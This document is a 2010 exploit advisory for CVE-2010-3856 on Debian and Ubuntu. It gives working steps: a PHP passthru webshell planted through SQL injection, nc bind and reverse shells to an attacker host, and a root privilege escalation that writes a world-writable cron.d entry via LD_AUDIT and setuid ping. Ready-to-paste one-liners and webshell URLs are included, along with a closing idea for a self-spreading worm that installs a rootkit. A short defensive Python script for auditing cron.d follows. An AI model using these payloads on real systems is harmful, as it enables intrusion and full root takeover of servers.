Debian <=5.0.6 /Ubuntu <=10.04 Webshell-Remote-Root
Source: fhausberger[at]gmail[dot]com  Author: jmit  Published: 2010-10-29
# Exploit Title:	Debian <=5.0.6 /Ubuntu <=10.04 Webshell-Remote-Root
# Date: 		24-10-2010
# Author: 		jmit
# Mail: 		fhausberger[at]gmail[dot]com 
# Tested on: 		Debian 5.0.6
# CVE:			CVE-2010-3856

--------------
| DISCLAIMER |
--------------

# IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.

--------- 
| ABOUT |
---------

Debian/Ubuntu remote root exploitation example (GNU dynamic linker DSO vuln).
See (http://www.exploit-db.com/exploits/15304/). Should work on other linux
distros too.

--------------
| BACKGROUND |
--------------

Typically it isn't possible to use a suidshell or modify /etc/passwd directly after
webshell access (user nobody) to gain root access. But with the DSO vuln we can
launch commands as root and we can create a socket and connect to the user or setup
a bindshell.

----------- 
| EXPLOIT |
-----------

After you have found a SQL-Injection vuln you can create a php backdoor. This is typically
possible with a select into dumpfile/outfile statement. The value is a simple
<? passthru($_GET['c']); ?> backdoor.

---
DROP TABLE IF EXISTS `fm`;
CREATE TABLE `fm` ( `fm` longblob ) TYPE=MyISAM;
insert into fm (fm) values (0x3c3f20706173737468727528245f4745545b2763275d293b203f3e);
select fm from fm into dumpfile '/opt/lampp/htdocs/xampp_backup.php';
drop table fm;
flush logs;
---

Now you can connect to the server and create a connection with telnet, nc, write a binary with
perl -e 'print "\x41\x42\x43\x44"', echo -en '\x41\x42\x43\x44', ...

If direct shell access isn't possible you can use php code to create your own binary with php fwrite:

---
<?php
$File = "/tmp/nc";
$Handle = fopen($File, 'w');
$Data = "\x41\x42\x43\x44";
fwrite($Handle, $Data);
fclose($Handle);
?>
---

Now use

Bind-Shell:    http://victimip/xampp_backup.php?c=nc -l -p 9999 -e /bin/bash
Reverse-Shell: http://victimip/xampp_backup.php?c=/bin/nc attackerip 9999 | /bin/bash

in your webbrowser and connect to your shell:

$ nc victimip 9999
id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)

---

Now let's exploit the DSO vuln. You need umask 0 for correct rw-rw-rw creation of the
exploit entry /etc/cron.d/exploit:

$ umask 0

This is the shellscript for the cron.d entry.

Bind-Shell:
$ echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh
Reverse-Shell:
$ echo -e '/bin/nc localhost 8888 | /bin/bash' > /tmp/exploit.sh

Now make your shellscript executable for cron:

$ chmod u+x /tmp/exploit.sh

Create a rw-rw-rw file in the cron directory using the setuid ping program:

$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping

Launch a suid root shell every minute:

$ echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit

Now you have a root shell every minute.

$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)

-------------------
| EXPLOIT oneline |
-------------------

echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit

$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)

------------------------------
| EXPLOIT from webshell only |
------------------------------

http://victimip/xampp_backup.php?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh
http://victimip/xampp_backup.php?c=/bin/chmod 0744 /tmp/exploit.sh
http://victimip/xampp_backup.php?c=umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
http://victimip/xampp_backup.php?c=echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit

$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)

---------------------------------
| EXPLOIT from webshell oneline |
---------------------------------

http://victimip/xampp_backup.php?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit

$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)

---------
| IDEAS |
---------

Looks like a wormable bug. The url-obfuscated (IDS/IPS) worm searches for SQLI/BSQLI bugs or
remote code execution bugs. Then the worm injects the evil url and does the same for other ips.
It installs a rootkit-bot and the game is over.
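The privilege escalation above leaves two concrete artifacts in /etc/cron.d: a world-writable entry (PCPROFILE_OUTPUT under umask 0 creates it rw-rw-rw-) and a root cron line that runs a script from /tmp. The following audit script, an added defensive example that is not part of the advisory, checks a cron.d directory for both; the sample directory it builds is constructed, and the list of untrusted path prefixes is an assumption about a typical Linux layout.

```python
"""Audit a cron.d directory for the artifacts this advisory describes: a world-writable
entry (PCPROFILE_OUTPUT under umask 0 leaves rw-rw-rw-) or an entry whose command runs
from a user-writable staging path such as /tmp. Added defensive example, not advisory code."""
import os
import re
import stat
import tempfile

# Paths an unprivileged local user can normally write to (assumption: typical Linux layout).
UNTRUSTED_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/")
# cron.d lines carry a user field after the five time fields: m h dom mon dow user command
CRON_LINE = re.compile(r"^\s*(\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")

def audit_cron_dir(path, expect_owner_uid=0):
    """Return a list of (entry name, reason); expect_owner_uid=None skips the owner check."""
    findings = []
    for name in sorted(os.listdir(path)):
        full = os.path.join(path, name)
        st = os.lstat(full)
        if not stat.S_ISREG(st.st_mode):
            continue  # cron only reads regular files, so only those are audited
        if st.st_mode & stat.S_IWOTH:
            findings.append((name, "world-writable cron entry (mode %o)" % stat.S_IMODE(st.st_mode)))
        if expect_owner_uid is not None and st.st_uid != expect_owner_uid:
            findings.append((name, "unexpected owner uid %d" % st.st_uid))
        with open(full, errors="replace") as fh:
            for line in fh:
                if line.lstrip().startswith("#"):
                    continue
                m = CRON_LINE.match(line)
                if not m:
                    continue
                cmd = m.group("cmd").strip()
                if any(tok.startswith(UNTRUSTED_PREFIXES) for tok in cmd.split()):
                    findings.append((name, "runs as %s from untrusted path: %s" % (m.group("user"), cmd)))
    return findings

def build_sample_dir():
    """Constructed sample: one benign entry and one shaped like the advisory's /etc/cron.d/exploit."""
    d = tempfile.mkdtemp()
    with open(os.path.join(d, "logrotate"), "w") as fh:
        fh.write("0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n")
    os.chmod(os.path.join(d, "logrotate"), 0o644)
    with open(os.path.join(d, "exploit"), "w") as fh:
        fh.write("*/1 * * * * root /tmp/exploit.sh\n")
    os.chmod(os.path.join(d, "exploit"), 0o666)  # rw-rw-rw-, as left behind by umask 0
    return d
```

On a real host run audit_cron_dir("/etc/cron.d") as root and treat any finding as an indicator worth investigating alongside the glibc version.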
